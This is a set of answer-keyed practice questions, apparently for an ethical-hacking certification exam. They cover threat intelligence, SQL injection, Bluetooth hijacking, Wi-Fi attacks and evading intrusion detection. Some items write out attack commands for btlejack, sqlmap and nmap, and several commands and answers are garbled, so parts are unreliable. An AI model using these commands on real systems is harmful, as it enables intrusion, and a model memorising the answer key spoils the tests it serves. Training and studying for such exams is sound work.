What information security law or standard aims at protecting stakeholders and the general public from accounting errors and fraudulent activities within organizations?

PCI-DSS
FISMA
SOX
ISO/I EC 27001:2013

A

SOX

455
Q

Kevin, an encryption specialist, implemented a technique that enhances the security of keys used for encryption and authentication. Using this technique, Kevin input an initial key to an algorithm that generated an enhanced key that is resistant to brute-force attacks. What is the technique employed by Kevin to improve the security of encryption keys?

Key derivation function
Key reinstallation
A Public key infrastructure
Key stretching

A

Key stretching

456
Q

Ron, a security professional, was pen testing web applications and SaaS platforms used by his company. While testing, he found a vulnerability that allows hackers to gain unauthorized access to API objects and perform actions such as view, update, and delete sensitive data of the company.
What is the API vulnerability revealed in the above scenario?

Code injections
Improper use of CORS
No ABAC validation
Business logic flaws

A

No ABAC validation

457
Q

Leverox Solutions hired Arnold, a security professional, for the threat intelligence process. Arnold collected information about specific threats against the organization. From this information, he retrieved contextual information about security events and incidents that helped him disclose potential risks and gain insight into attacker methodologies. He collected the information from sources such as humans, social media, and chat rooms as well as from events that resulted in cyberattacks. In this process, he also prepared a report that includes identified malicious activities, recommended courses of action, and warnings for emerging attacks. What is the type of threat intelligence collected by Arnold in the above scenario?

Strategic threat intelligence
Tactical threat intelligence
Operational threat intelligence
Technical threat intelligence

A

Operational threat intelligence

458
Q

Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure communication. In this process, she employs a component of the Web Service Architecture, which is an extension of SOAP, and it can maintain the integrity and confidentiality of SOAP messages.
Which of the following components of the Web Service Architecture is used by Rebecca for securing the communication?

WSDL
WS Work Processes
WS-Policy
WS-Security

A

WS-Security

459
Q

Jake, a professional hacker, installed spyware on a target iPhone to spy on the target user’s activities. He can take complete control of the target mobile device by jailbreaking the device remotely and record audio, capture screenshots, and monitor all phone calls and SMS messages. What is the type of spyware that Jake used to infect the target device?

DroidSheep
Androrat
Zscaler
Trident

A

Trident

460
Q

Clark, a professional hacker, attempted to perform a Btlejacking attack using an automated tool, Btlejack, and hardware tool, micro:bit. This attack allowed Clark to hijack, read, and export sensitive information shared between connected devices. To perform this attack, Clark executed various btlejack commands. Which of the following commands was used by Clark to hijack the connections?

btlejack-f 0x129f3244-j
btlejack -c any
btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
btlejack -f 0x9c68fd30 -t -m 0x1 fffffffff

A

btlejack -f 0x9c68fd30 -t -m 0x1 fffffffff

461
Q

Mike, a security engineer, was recently hired by BigFox Ltd. The company recently experienced disastrous DoS attacks. The management had instructed Mike to build defensive strategies for the company’s IT infrastructure to thwart DoS/DDoS attacks. Mike deployed some countermeasures to handle jamming and scrambling attacks. What is the countermeasure Mike applied to defend against jamming and scrambling attacks?

Allow the usage of functions such as gets and strcpy
Allow the transmission of all types of addressed packets at the ISP level
Implement cognitive radios in the physical layer
A Disable TCP SYN cookie protection

A

Implement cognitive radios in the physical layer

462
Q

What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.

Reveals the daily outgoing message limits before mailboxes are locked

The internal command RCPT provides a list of ports open to message traffic.

A list of all mail proxy server addresses used by the targeted host

A

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.

463
Q

Gregory, a professional penetration tester working at Sys Security Ltd., is tasked with performing a security test of web applications used in the company. For this purpose, Gregory uses a tool to test for any security loopholes by hijacking a session between a client and server. This tool has a feature of intercepting proxy that can be used to inspect and modify the traffic between the browser and target application. This tool can also perform customized attacks and can be used to test the randomness of session tokens. Which of the following tools is used by Gregory in the above scenario?

Nmap
Burp Suite
CxSAST
Wireshark

A

Burp Suite

464
Q

When considering how an attacker may exploit a web server, what is web server footprinting?

When an attacker implements a vulnerability scanner to identify weaknesses

When an attacker creates a complete profile of the site’s external links and file structures

When an attacker gathers system-level data, including account details and server names

When an attacker uses a brute-force attack to crack a web-server password

A

When an attacker gathers system-level data, including account details and server names

465
Q

Which of the following tactics uses malicious code to redirect users’ web traffic?

Spimming
Pharming
Phishing
Spear-phishing

A

Pharming

466
Q

Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMvl by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks. What is the type of attack performed by Simon?

Internal monologue attack
Combinator attack
Rainbow table attack
Dictionary attack

A

Internal monologue attack

467
Q

Calvin, a grey-hat hacker, targets a web application that has design flaws in its authentication mechanism. He enumerates usernames from the login form of the web application, which requests users to feed data and specifies the incorrect field in case of invalid credentials. Later, Calvin uses this information to perform social engineering.
Which of the following design flaws in the authentication mechanism is exploited by Calvin?

Insecure transmission of credentials
Verbose failure messages
User impersonation
Password reset mechanism

A

Verbose failure messages

468
Q

Henry is a penetration tester who works for XYZ organization. While performing enumeration on a client organization, he queries the DNS server for a specific cached DNS record. Further, by using this cached record, he determines the sites recently visited by the organization’s user. What is the enumeration technique used by Henry on the organization?

DNS zone walking
DNS cache snooping
DNS SEC zone walking
DNS cache poisoning

A

DNS cache snooping

469
Q

An attacker decided to crack the passwords used by industrial control systems. In this process, he employed a loop strategy to recover these passwords. He used one character at a time to check whether the first character entered is correct; if so, he continued the loop for consecutive characters. If not, he terminated the loop. Furthermore, the attacker checked how much time the device took to finish one complete password authentication process, through which he deduced how many characters entered are correct.
What is the attack technique employed by the attacker to crack the passwords of the industrial control systems?

Side-channel attack
Denial-of-service attack
HMI-based attack
Buffer overflow attack

A

Side-channel attack

470
Q

Mary, a penetration tester, has found password hashes in a client system she managed to breach. She needs to use these passwords to continue with the test, but she does not have time to find the passwords that correspond to these hashes. Which type of attack can she implement in order to continue?

LLMNR/NBT-NS poisoning
Internal monologue attack
Pass the ticket
Pass the hash

A

Pass the hash

470
Q

Jack, a disgruntled ex-employee of Incalsol Ltd., decided to inject fileless malware into Incalsol’s systems. To deliver the malware, he used the current employees’ email IDs to send fraudulent emails embedded with malicious links that seem to be legitimate. When a victim employee clicks on the link, they are directed to a fraudulent website that automatically loads Flash and triggers the exploit. What is the technique used byjack to launch the fileless malware on the target systems?

In-memory exploits
Phishing
Legitimate applications
Script-based injection

A

Phishing

471
Q

In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses.
What is the tool used by Hailey for gathering a list of words from the target website?

Shadowsocks
CeWL
Psiphon
Orbot

A

CeWL

472
Q

Sam, a web developer, was instructed to incorporate a hybrid encryption software program into a web application to secure email messages. Sam used an encryption software, which is a free implementation of the OpenPGP standard that uses both symmetric-key cryptography and asymmetric-key cryptography for improved speed and secure key exchange. What is the encryption software employed by Sam for securing the email messages?

PGP
S/MIME
SMTP
GPG

A

GPG

473
Q

Which among the following is the best example of the hacking concept called “clearing tracks”?

After a system is breached, a hacker creates a backdoor to allow re-entry into a system.

During a cyberattack, a hacker injects a rootkit into a server.

An attacker gains access to a server through an exploitable vulnerability.

During a cyberattack, a hacker corrupts the event logs on all machines.

A

During a cyberattack, a hacker corrupts the event logs on all machines.

474
Q

Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his company’s network infrastructure to identify security loopholes. In this process, he started to circumvent the network protection tools and firewalls used in the company. He employed a technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the network resources. What is the attack technique used by Jude for finding loopholes in the above scenario?

UDP flood attack
Ping-of-death attack
Spoofed session flood attack
Peer-to-peer attack

A

Spoofed session flood attack

475
Q

Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their service and wanted to move to another CSP. What part of the contract might prevent him from doing so?

Virtualization
Lock-in
Lock-down
Lock-up

A

Lock-in

475
Q

Alex, a cloud security engineer working in Eyecloud Inc. is tasked with isolating applications from the underlying infrastructure and stimulating communication via well-defined channels. For this purpose, he used an open-source technology that helped him in developing, packaging, and running applications; further, the technology provides PaaS through OS-level visualization, delivers containerized software packages, and promotes fast software delivery. What is the cloud technology employed by Alex in the above scenario?

Virtual machine
Serverless computing
Docker
Zero trust network

A

Docker

476
Q

CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed Bob, a security professional, to build and incorporate defensive strategies against such attacks. Bob adopted a practice whereby only a list of entities such as the data type, range, size, and value, which have been approved for secured access, is accepted. What is the defensive technique employed by Bob in the above scenario?

Output encoding
Enforce least privileges
Whitelist validation
Blacklist validation

A

Whitelist validation

477
Q

Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?

Evil twin attack
DNS cache flooding
MAC flooding
DDoS attack

A

MAC flooding

478
Q

What is the following command used for?
sqlmap.py-u ,,http://10.10.1.20/?p=1&forumaction=search” -dbs

Creating backdoors using SQL injection

A Enumerating the databases in the DBMS for the URL

Retrieving SQL statements being executed on the database

Searching database statements at the IP address given

A

A Enumerating the databases in the DBMS for the URL

479
Q

Which of the following types of SQL injection attacks extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?

Error-based injection
Boolean-based blind SQL injection
Blind SQL injection
Union SQL injection

A

Union SQL injection

480
Q

Your organization has signed an agreement with a web hosting provider that requires you to take full responsibility of the maintenance of the cloud-based resources. Which of the following models covers this?

Platform as a service
Software as a service
Functions as a
Service Infrastructure as a service

A

service Infrastructure as a service

480
Q

Lewis, a professional hacker, targeted the loT cameras and devices used by a target venture-capital firm. He used an information-gathering tool to collect information about the loT devices connected to a network, open ports and services, and the attack surface are
a. Using this tool, he also generated statistical reports on broad usage patterns and trends. This tool helped Lewis continually monitor every reachable server and device on the Internet, further allowing him to exploit these devices in the network. Which of the following tools was employed by Lewis in the above scenario?

Censys
Wapiti
NeuVector
Lacework

A

Censys

481
Q

George, an employee of an organization, is attempting to access restricted websites from an official computer. For this purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous anonymity for all his online activities. Which of the following anonymizers helps George hide his activities?

https://www.baidu.com
https://www.guardster.com
https://www.wolframalpha.com
https://karmadecay.com

A

https://www.guardster.com

482
Q

Richard, an attacker, targets an MNC In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard?

VPN footprinting
Email footprinting
VoIP footprinting
Whois footprinting

A

Whois footprinting

483
Q

An attacker utilizes a Wi-Fi Pineapple to run an access point with a legitimate-looking SSID for a nearby business in order to capture the wireless password. What kind of attack is this?

MAC spoofing attack
Evil-twin attack
War driving attack
Phishing attack

A

Evil-twin attack

483
Q

You are using a public Wi-Fi network inside a coffee shop. Before surfing the web, you use your VPN to prevent intruders from sniffing your traffic. If you did not have a VPN, how would you identify whether someone is performing an ARP spoofing attack on your laptop?

You should check your ARP table and see if there is one IP address with two different MAC addresses.

You should scan the network using Nmap to check the MAC addresses of all the hosts and look for duplicates.

You should use netstat to check for any suspicious connections with another IP address within the LAN.

You cannot identify such an attack and must use a VPN to protect your traffic

A

You should check your ARP table and see if there is one IP address with two different MAC addresses.

484
Q

This type of injection attack does not show any error message. It is difficult to exploit as it returns information when the application is given SQL payloads that elicit a true or false response from the server. By observing the response, an attacker can extract sensitive information. What type of attack is this?

Time-based SQL injection

Union SQL injection

Error-based SQL injection

Blind SQL injection

A

Blind SQL injection

485
Q

An attacker identified that a user and an access point are both compatible with WPA2 and WPA3 encryption. The attacker installed a rogue access point with only WPA2 compatibility in the vicinity and forced the victim to go through the WPA2 four-way handshake to get connected. After the connection was established, the attacker used automated tools to crack WPA2-encrypted messages. What is the attack performed in the above scenario?

Timing-based attack
Side-channel attack
Downgrade security attack
Cache-based attack

A

Downgrade security attack

486
Q

Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which of the following tools is employed by Clark to create the spoofed email?

PyLoris
Slowloris
Evilginx
PLCinject

A

Evilginx

487
Q

Which of the following Bluetooth hacking techniques does an attacker use to send messages to users without the recipient’s consent, similar to email spamming?

Bluesmacking
BlueSniffing
Bluejacking
Bluesnarfing

A

Bluejacking

488
Q

Jacob works as a system administrator in an organization. He wants to extract the source code of a mobile application and disassemble the application to analyze its design flaws. Using this technique, he wants to fix any bugs in the application, discover underlying vulnerabilities, and improve defense strategies against attacks.
What is the technique used by Jacob in the above scenario to improve the security of the mobile application?

Reverse engineering
App sandboxing
Jailbreaking
Social engineering

A

Reverse engineering

489
Q

Which rootkit is characterized by its function of adding code and/or replacing some of the operating- system kernel code to obscure a backdoor on a system?

User-mode rootkit
Library-level rootkit
Kernel-level rootkit
Hypervisor-level rootkit

A

Kernel-level rootkit

490
Q

Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?

getsystem
getuid
keylogrecorder
autoroute

A

getsystem

491
Q

Robert, a professional hacker, is attempting to execute a fault injection attack on a target IoT device. In this process, he injects faults into the power supply that can be used for remote execution, also causing the skipping of key instructions. He also injects faults into the clock network used for delivering a synchronized signal across the chip.
Which of the following types of fault injection attack is performed by Robert in the above scenario?

Frequency/voltage tampering
Optical, electromagnetic fault injection (EMFI)
Temperature attack
Power/clock/reset glitching

A

Power/clock/reset glitching

492
Q

You are attempting to run an Nmap port scan on a web server. Which of the following
commands would result in a scan of common ports with the least amount of noise In order to
evade IDS?

nmap -sP- -p-65535-T5
nmap-A-host-time 99-T1
nmap -A -Pn
nmap -sT-O- To

A

nmap -sT-O- To